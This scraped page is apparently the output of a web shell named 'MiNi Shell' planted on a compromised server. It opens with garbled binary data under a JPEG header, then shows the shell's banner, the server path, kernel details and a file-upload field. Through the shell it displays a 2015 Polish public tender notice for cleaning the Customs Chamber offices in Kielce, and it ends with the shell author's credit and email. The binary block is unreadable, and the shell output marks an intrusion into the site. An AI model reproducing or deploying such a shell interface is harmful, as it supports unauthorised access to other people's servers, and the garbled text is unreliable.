JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150413/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150413/82624-N-2015.html

<p class="kh_header"><b>Kielce: Sprzątanie pomieszczeń biurowych w obiektach Izby Celnej przy ul. Wesołej 56 w Kielcach oraz w obiekcie Urzędu Celnego przy ul. Ściegiennego 264 D w Kielcach 
w tym letnie i zimowe utrzymanie terenu na działce Izby Celnej 
w Kielcach przy ul. Wesołej 56 oraz na działce Urzędu Celnego 
w Kielcach przy ul. Ściegiennego 264 D.</b><br>
<b>Numer ogłoszenia: 82624 - 2015; data zamieszczenia: 13.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Kielcach , ul. Wesoła 56, 25-363 Kielce, woj. świętokrzyskie, tel. 41 3642810, faks 41 3642847.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zamowienia.publiczne@kie.mofnet.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń biurowych w obiektach Izby Celnej przy ul. Wesołej 56 w Kielcach oraz w obiekcie Urzędu Celnego przy ul. Ściegiennego 264 D w Kielcach 
w tym letnie i zimowe utrzymanie terenu na działce Izby Celnej 
w Kielcach przy ul. Wesołej 56 oraz na działce Urzędu Celnego 
w Kielcach przy ul. Ściegiennego 264 D..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	SZCZEGÓŁOWY ZAKRES USŁUG SPRZĄTANIA

1)	Sprzątanie pomieszczeń biurowych :

a.	Czynności wykonywane codziennie od poniedziałku do piątku:
-	wycieranie na mokro twardych powierzchni podłóg ,
-	opróżnianie koszy oraz wymienianie w nich worków foliowych,

b.	Czynności wykonywane dwa razy w tygodniu:
-	  opróżnianie niszczarek i wymienianie w nich worków foliowych,

c.	Czynności wykonywane trzy razy w tygodniu:
	-  odkurzanie wykładzin dywanowych,

d.	Czynności wykonywane raz w tygodniu:
-	wycieranie na wilgotno parapetów i grzejników;
-	odkurzanie pajęczyn, 
-	 wycieranie na wilgotno mebli biurowych, drzwi, krzeseł, foteli
-	utrzymywanie w czystości urządzeń kuchennych,

2)	Sprzątanie ciągów komunikacyjnych i wejść:

a.	Czynności wykonywane codziennie od poniedziałku do piątku:
-	odkurzanie lub zamiatanie powierzchni podłóg,
-	mycie powierzchni podłóg,
-	 czyszczenie wycieraczek zewnętrznych, 
-	zamiatanie powierzchni podestów przed drzwiami wejściowymi
Posadzki z kamieni naturalnych i lastryko.

b.	Czynności wykonywane raz w tygodniu:
-	odkurzanie pajęczyn;
-	wycieranie wywieszek, gaśnic, hydrantów, gablot itp.,
c.	Czynności wykonywane raz w miesiącu:
-	mycie drzwi i ścianek przeszklonych wiatrołapów,
-	mycie drzwi wejściowych i wewnętrznych.


3)	Sprzątanie pomieszczeń sanitarnych i łazienek:
Powierzchnia łazienek: IC Kielce - 42,0m2, UC Kielce - 55,0m2 

a.	Czynności wykonywane codziennie od poniedziałku do piątku:
     - mycie  i dezynfekcja urządzeń sanitarnych oraz nie dopuszczanie do osadzania się    kamienia w spłuczkach, umywalkach i na armaturze
	- wycieranie dozowników sanitarnych
	- opróżnianie koszy i wymiana worków foliowych, 
	- uzupełnianie dozowników mydła, papieru toaletowego i ręczników papierowych,
	- wycieranie na mokro parapetów i podłóg.
	
b.	Czynności wykonywane raz w tygodniu:
- odkurzanie pajęczyn,
- mycie armatury i innych przedmiotów chromowanych specjalnymi środkami,
- mycie luster i szafek łazienkowych,
- mycie ścian z glazury.

4)	Sprzątanie pomieszczeń pozostałych m.in.  archiwum, kotłownie, magazyny podręczne :
Powierzchnie :
Kotłownia IC Kielce - 28,0m2,   (posadzka gresowa)
Kotłownia UC Kielce - 25,0m2,  (posadzka gresowa)
Magazyny w IC Kielce - 45,0m2,(posadzka gresowa)
Archiwum w IC Kielce - 60,0m2.(posadzka tarket)

a.	Czynności wykonywane raz w tygodniu:
- zamiatanie i wycieranie na mokro twardych powierzchni podłóg,
- wycieranie na wilgotno mebli biurowych i regałów.

b.	Czynności wykonywane raz w miesiącu:
- odkurzanie pajęczyn,
- mycie ścian z glazury. (kotłownie)


5)	Utrzymanie czystości i estetyki terenów na zewnątrz budynków:

a.	Czynności wykonywane codziennie od poniedziałku do piątku w zależności od   pory  roku,
-	zamiatanie i odśnieżanie schodów wejściowych (przed rozpoczęciem pracy urzędu),
-	zamiatanie i odśnieżanie chodników (przed rozpoczęciem pracy urzędu).
-	W przypadku obfitych opadów śniegu lub powstania oblodzeń Wykonawca musi zapewnić osoby których zadaniem będzie wyeliminowanie zagrożeń i odśnieżenia ciągów pieszych.
Piasek i sól do posypywania terenu zewnętrznego kupuje Wykonawca .

b.	Czynności wykonywane raz w tygodniu:
-	zamiatanie parkingów przy Izbie Celnej i Urzędzie Celnym,

c.	 Czynności wykonywane według potrzeb w zależności od   pory  roku,
- zamiatanie i odśnieżanie drogi dojazdowej do siedziby Izby Celnej w Kielcach oraz Urzędu Celnego w Kielcach (przed rozpoczęciem pracy urzędu), 
	- koszenie trawy - według potrzeb,
	- przycinanie krzewów i drzew - według potrzeb.

6)	Codzienne wynoszenie śmieci do kontenerów na odpady.
7)	Mycie okien dwa razy w roku w terminach kwiecień i wrzesień
8)	Dostarczanie do wszystkich obiektów zamawiającego w ramach oferowanej ceny sprzętu i środków higienicznych potrzebnych do sprzątania, papieru toaletowego, worków na śmieci, mydła w płynie, ręczników papierowych zgodnie z następującymi wymaganiami:
-	mydło w płynie do pojemników typu Merida nawilżające, glicerynowe o delikatnym zapachu, 
-	papier toaletowy co najmniej dwuwarstwowy  w kolorze białym - niepylący (wielkość rolki dopasowana do pojemników zamontowanych u Zamawiającego, w przypadku zastosowania innych rozmiarów papieru Wykonawca zamontuje nieodpłatnie dozowniki dopasowane do tych wymiarów);
-	ręczniki papierowe w listkach (składanka) dopasowanych do standardowych podajników typu Merida, w kolorze białym lub zielonym niepylące;
-	środki myjące, czyszczące, dezynfekujące, neutralizujące zapachy toalet - o delikatnej   
  nucie zapachowej, 
- wkłady do WC lub kostki zapachowe,
- odświeżacze powietrza o delikatnym zapachu,
- worki foliowe do koszy na śmieci i niszczarek oraz inne środki czystości niezbędne do wykonywania przedmiotu zamówienia. 

Do celów obliczenia zapotrzebowania na wyżej wymienione materiały informujemy, że w budynku Izby Celnej w Kielcach zatrudnionych jest 100 osób, a w Urzędzie Celnym i Oddziale Celnym w Kielcach przy ul. Ściegiennego w Kielcach 84 osoby. W budynku UC Kielce należy przy obliczeniach uwzględnić interesantów, którzy mogą korzystać ze środków higienicznych - ok. 30 - 35 osób/dzień.

9)	Zamawiający wymaga, by osoby sprzątające wykonały powierzone czynności:  
a.	na terenie Izby Celnej w Kielcach w godzinach urzędowania tj.  7.30 - 15.30,  
w tym na terenie wydzielonej strefy w budynku Izby Celnej w Kielcach  od  godz. 12.00 do godz. 15.00 na terenie Urzędu Celnego w Kielcach od godz. 10.00  do godz. 17.00. w tym między godz. 10.00 - 14.00 utrzymanie czystość ciągów komunikacyjnych.
b.	realizacja w/w czynności w innych godzinach wymaga uzgodnienia                                 z Zamawiającym.

c.	Wykonawca zobowiązuje się zapewnić odpowiednią liczbę osób gwarantujących rzetelność wykonania usług oraz poszanowania mienia Zamawiającego i jego pracowników.  
II.	POWIERZCHNIE I WYPOSAŻENIE TECHNICZNE OBJĘTE ZAKRESEM USŁUG SPRZĄTANIA
Łączna powierzchnia wewnętrzna objęta usługą sprzątania wynosi 2779 m2, a teren zewnętrzny wokół budynków 2010 m2.
1)	Izba Celna w Kielcach  ul. Wesoła 56 

a.	Budynek główny - trzy piętrowy, podpiwniczony 

-	powierzchnia biurowa z wykładzinami dywanowymi - 100,00 m2 
-	powierzchnia biurowa ogółem -1120,0 m2
-	powierzchnia korytarzy - 240 m2
-	powierzchnia biurowa z podłogami do zmywania (wykładzina zmywalna) oraz glazura i terakota w pomieszczeniach sanitarnych - łączna powierzchnia 1355,00 m2 
-	Pięć pomieszczeń sanitarnych wyposażonych w: 
-	muszle klozetowe - 10 szt.
-	lustra - 5 szt. 
-	pojemniki na ręczniki papierowe (składanka) - 6 szt. 
-	pojemniki na mydło w płynie - 5 szt. 
-	pojemniki na papier toaletowy - 10 szt. 
-	Powierzchnia szklana: okna, drzwi -  350,00 m2 

b.	Budynek oficyny - parterowy 
-	powierzchnia biurowa, komunikacja, sanitariaty (całkowita powierzchnia obiektu) z podłogami do zmywania (wykładzina zmywalna) - 185,00 m2
-	Dwa pomieszczenia sanitarne wyposażone w:
-	muszle klozetowe - 2 szt.
-	kabina prysznicowa - 1 szt. 
-	lustra - 2 szt. 
-	pojemniki na ręczniki papierowe (składanka) - 2 szt. 
-	pojemniki na papier toaletowy - 2 szt. 
-	Powierzchnia szklana: okna, drzwi - 15 m2 

c.	Tereny zewnętrzne:
-	Parkingi, chodniki, - 600 m2
-	Trawniki		   -  109 m2

2.  Urząd Celny/Oddział Celny w Kielcach: ul. Ściegiennego 264 D 

a.	Budynek dwu piętrowy 
-	powierzchnia biurowa z wykładzinami dywanowymi - 160,40 m2 
-	powierzchnia biurowa - 830 m2
-	powierzchnia korytarzy - 220 m2
-	powierzchnia biurowa z podłogami do zmywania (wykładzina zmywalna) oraz glazura                i terakota w pomieszczeniach sanitarnych - łączna powierzchnia - 980,60 m2 
-	Cztery pomieszczenia sanitarne wyposażone w: 
-	muszle klozetowe - 9 szt.
-	pisuar - 3 szt.
-	lustra - 6 szt. 
-	pojemniki na ręczniki papierowe - 6 szt. 
-	pojemniki na papier toaletowy - 9 szt. 
-	pojemniki na mydło w płynie - 8 szt. 
-	Powierzchnia szklana: okna, drzwi - 280,00 m2
 
b.	Teren zewnętrzny 
-	Parkingi, chodniki, - 800,00 m2.
-	Trawniki		 - 500,00 m2

Budynki wyposażone są w kosze plastikowe na worki o pojemności 60 L i mniejsze.
Budynki przy ul. Wesołej 56 - ok. 70 szt koszy, niszczarki. 
Budynek przy Ściegiennego  -  ok. 40 szt. koszy, niszczarki..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.92.00-4, 90.91.13.00-9, 90.91.40.00-7, 90.62.00.00-9, 77.31.41.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje należycie 
w ramach głównych usług co najmniej dwie główne usługi  rozumiane jako dwa zamówienia sprzątania obiektów odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia. Przez główną usługę odpowiadającą swoim rodzajem 
i wartością przedmiotowi zamówienia należy rozumieć świadczenie usługi sprzątania. Zamawiający uwzględni usługę zrealizowaną tj. zakończoną przed upływem terminu składania ofert, a także usługę trwającą nadal, pod warunkiem, że obejmowała sprzątanie obiektu/obiektów o powierzchni nie mniejszej niż  
2000 m2 (słownie : dwa tysiące metrów kwadratowych).
W celu potwierdzenia spełnienia warunku należy załączyć do oferty wypełniony załącznik nr 4 do SIWZ oraz dołączyć dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków ich zmian zawiera projekt umowy stanowiący załącznik nr 6 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ickielce.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna w Kielcach ul. Wesoła 56, 25-363 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2015 godzina 12:00, miejsce: Izba Celna w Kielcach ul. Wesoła 56, 25-363 Kielce pok. nr 109 - Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com